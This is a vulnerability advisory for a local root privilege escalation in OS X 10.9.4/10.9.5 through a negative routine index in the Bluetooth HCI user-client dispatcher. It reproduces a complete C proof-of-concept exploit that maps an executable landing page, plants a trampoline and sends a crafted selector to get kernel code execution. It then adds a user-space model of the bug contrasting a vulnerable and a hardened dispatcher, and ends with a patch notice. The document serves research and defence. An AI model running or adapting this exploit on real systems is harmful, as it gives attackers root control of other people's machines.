Apple Mac OS X IOBluetoothHCIController Local Privilege Escalation Vulnerability
Release date:
Updated on:
Affected Systems:
Apple Mac OS X 10.9.5
Apple Mac OS X 10.9.4
Description:
Bugtraq id: 70894
OS X (formerly Mac OS X) is the operating system Apple develops for its Mac computers.
The IOBluetoothHCIController implementation in Apple Mac OS X 10.9.4 and 10.9.5 has a local privilege escalation vulnerability: IOBluetoothHCIUserClient::SimpleDispatchWL() does not check the sign of a user-supplied routine index, so a negative index passes the bounds check and selects an entry outside the kernel's routine table. A local attacker can use this to execute arbitrary code in kernel context, i.e. with root privileges.
<* Source: Roberto Paleari (roberto.paleari@emaze.net)
Aristide Fattori
*>
Test method:
Alert
The following procedures (methods) may be offensive and are intended only for security research and teaching. Use them at your own risk!
/*
 * pwn.c, by @rpaleari and @joystick
 *
 * This PoC exploits a missing sign check in
 * IOBluetoothHCIUserClient::SimpleDispatchWL().
 *
 * Tested on Mac OS X Mavericks (10.9.4/10.9.5).
 *
 * Compile with: gcc -Wall -o pwn{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>

/* Runs in kernel context once the trampoline below has been reached. */
uint64_t payload(void) {
  /* Your payload goes here. */
  return 0;
}

int main(void) {
  /* Map our landing page (kernel will jump at tgt+7, i.e. to the pointer
     value 0x0000048800000007 it finds in the out-of-table entry) */
  vm_address_t tgt = 0x0000048800000000;
  vm_allocate(mach_task_self(), &tgt, 0x1000, 0);
  vm_protect(mach_task_self(), tgt, 0x1000, 0,
             VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE);
  memset((void *) tgt, 0, 0x1000);

  /* Prepare payload: a trampoline at tgt+7 that transfers control to payload() */
  char *target = (char *) tgt;
  /* mov rax, payload */
  target[7] = 0x48;
  target[8] = 0xb8;
  *(uint64_t *) (&target[9]) = (uint64_t) payload;
  /* jmp rax */
  target[17] = 0xff;
  target[18] = 0xe0;

  printf("[+] Payload function @ %016llx\n", (uint64_t) payload);
  printf("[+] Stored trampoline @ %016llx\n", (uint64_t) tgt + 7);

  /* Find the vulnerable service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
                                IOServiceMatching("IOBluetoothHCIController"));
  if (!service) {
    return -1;
  }

  /* Connect to the vulnerable service (user client type 0) */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf("[+] Opened connection to service on port: %d\n", port);

  /* The first 8 bytes must be 0, so we don't have to handle following
     parameters */
  char a[] = "\x00\x00\x00\x00\x00\x00\x00\x00"
    /* Don't really matter for the exploit (ignored due to the 0s above) */
    "\x00\x00\x00\x00\x00\x00\x00\x07\x02\x00\x00\x00\x11\x0a\x00\x00\x03\x72\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\xe8\xfa\x2a\x54\xff\x7f\x00\x00\x78\x00\x00\x00\x00"
    "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    "\xa8\xfb\x2a\x54\xff\x7f\x00\x00\xd8\xfa\x2a\x54\xff\x7f\x00\x00\x60\x4a\xb6\x86"
    "\x80\xff"
    /* Index value 0xfff5b6a8 (negative as a signed 32-bit integer) makes
       _sRoutines[index] point to an in-kernel memory area that contains
       {0x0000048800000007, N}, with 0 <= N < 8. May need to be adjusted on
       other Mavericks versions. */
    "\xa8\xb6\xf5\xff\x80\xff";

  printf("[+] Launching exploit!\n");

  kr = IOConnectCallMethod((mach_port_t) port,  /* Connection */
                           (uint32_t) 0,        /* Selector */
                           NULL, 0,             /* input, inputCnt */
                           (const void *) a,    /* inputStruct */
                           sizeof(a),           /* inputStructCnt */
                           NULL, NULL);         /* Output stuff */

  /* Exec shell here after payload returns */

  return IOServiceClose(port);
}
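The PoC above relies on one property of the dispatcher: the routine index is compared only against the table's upper bound while being treated as a signed 32-bit value, so 0xfff5b6a8 (a large negative number) gets past the check and selects "an entry" far below the real table. The following user-space model is an added example, not the original PoC and not Apple's kernel code. The table layout, entry format, routine names and sizes are constructed for illustration (the kernel's _sRoutines is not reproduced here); the planted entry at a negative offset stands in for the in-kernel memory that happened to contain a valid-looking {pointer, N} pair, and the "fixed" dispatcher shows the generic hardening, not Apple's actual patch.

```c
/*
 * Added example: a model of a signed-index dispatch bug of the kind the PoC
 * above exploits. Not the kernel's code; table layout and routines are
 * constructed for the example.
 */
#include <stdint.h>
#include <stdio.h>

typedef int (*routine_fn)(uint64_t arg);

/* Mirrors the {function pointer, argument count} pair the PoC comment
   describes ({0x0000048800000007, N} with 0 <= N < 8). */
typedef struct {
    routine_fn fn;
    uint64_t   nargs;
} dispatch_entry;

static int real_routine(uint64_t arg)     { return (int)(arg + 1); }
static int attacker_routine(uint64_t arg) { (void)arg; return 0x41414141; }

enum { PRE_SLOTS = 4, TABLE_SIZE = 4 };

/* One contiguous block: slots [0, PRE_SLOTS) model whatever memory happens to
   sit below the table; the "official" table is the last TABLE_SIZE slots.
   Slot 1 (= sRoutines[-3]) is a constructed stand-in for the memory the PoC's
   negative index lands on: it looks like a valid entry, so the dispatcher
   takes it. The other pre-table slots are zero-filled. */
static dispatch_entry block[PRE_SLOTS + TABLE_SIZE] = {
    [1]             = { attacker_routine, 0 },
    [PRE_SLOTS + 0] = { real_routine, 1 },
    [PRE_SLOTS + 1] = { real_routine, 1 },
    [PRE_SLOTS + 2] = { real_routine, 2 },
    [PRE_SLOTS + 3] = { real_routine, 3 },
};
static dispatch_entry *const sRoutines = &block[PRE_SLOTS];

/* Decode the 4-byte little-endian selector as the kernel would see it.
   The PoC's bytes a8 b6 f5 ff give 0xfff5b6a8, i.e. -674136 as int32_t. */
int32_t selector_from_le_bytes(const uint8_t b[4])
{
    uint32_t u = (uint32_t)b[0] | ((uint32_t)b[1] << 8) |
                 ((uint32_t)b[2] << 16) | ((uint32_t)b[3] << 24);
    return (int32_t)u;   /* two's-complement reinterpretation */
}

/* Vulnerable dispatcher: upper bound only, signed index. Returns 0 on
   success with the routine's result in *out, -1 when the call is rejected. */
int dispatch_vulnerable(int32_t index, uint64_t arg, int *out)
{
    if (index >= TABLE_SIZE)
        return -1;                               /* looks like a bounds check ... */
    const dispatch_entry *e = &sRoutines[index]; /* ... but index may be negative */
    if (e->fn == NULL || e->nargs >= 8)          /* sanity check the PoC had to satisfy */
        return -1;
    *out = e->fn(arg);                           /* control flow follows e->fn */
    return 0;
}

/* Hardened dispatcher: reject negative selectors before indexing. Comparing
   the selector as an unsigned value against TABLE_SIZE is equivalent. */
int dispatch_fixed(int32_t index, uint64_t arg, int *out)
{
    if (index < 0 || index >= TABLE_SIZE)
        return -1;
    const dispatch_entry *e = &sRoutines[index];
    if (e->fn == NULL || e->nargs >= 8)
        return -1;
    *out = e->fn(arg);
    return 0;
}

/* Convenience wrappers: the routine's result, or -1 if the call was rejected. */
int run_vulnerable(int32_t index, uint64_t arg)
{
    int out = 0;
    return dispatch_vulnerable(index, arg, &out) == 0 ? out : -1;
}

int run_fixed(int32_t index, uint64_t arg)
{
    int out = 0;
    return dispatch_fixed(index, arg, &out) == 0 ? out : -1;
}

int main(void)
{
    const uint8_t poc_selector[4] = { 0xa8, 0xb6, 0xf5, 0xff }; /* bytes from the PoC */
    printf("PoC selector decodes to %d\n", selector_from_le_bytes(poc_selector));
    printf("vulnerable, index -3: 0x%x\n", run_vulnerable(-3, 0));
    printf("vulnerable, index -1: %d (zero entry, rejected)\n", run_vulnerable(-1, 0));
    printf("fixed, index -3:      %d (rejected)\n", run_fixed(-3, 0));
    printf("both, index 2, arg 5: %d / %d\n", run_vulnerable(2, 5), run_fixed(2, 5));
    return 0;
}
```

Two things the model makes visible that the raw PoC does not: a negative index is only useful where the memory it reaches already looks like a well-formed entry (index -1 here hits a zero entry and is rejected, which is why the PoC's comment warns the index may need adjusting per Mavericks build), and the fix is purely a matter of the comparison, since rejecting negatives (or comparing as unsigned) leaves every legitimate selector working unchanged.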
Suggestion:
Vendor patch:
Apple
-----
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:
http://www.apple.com/support/downloads/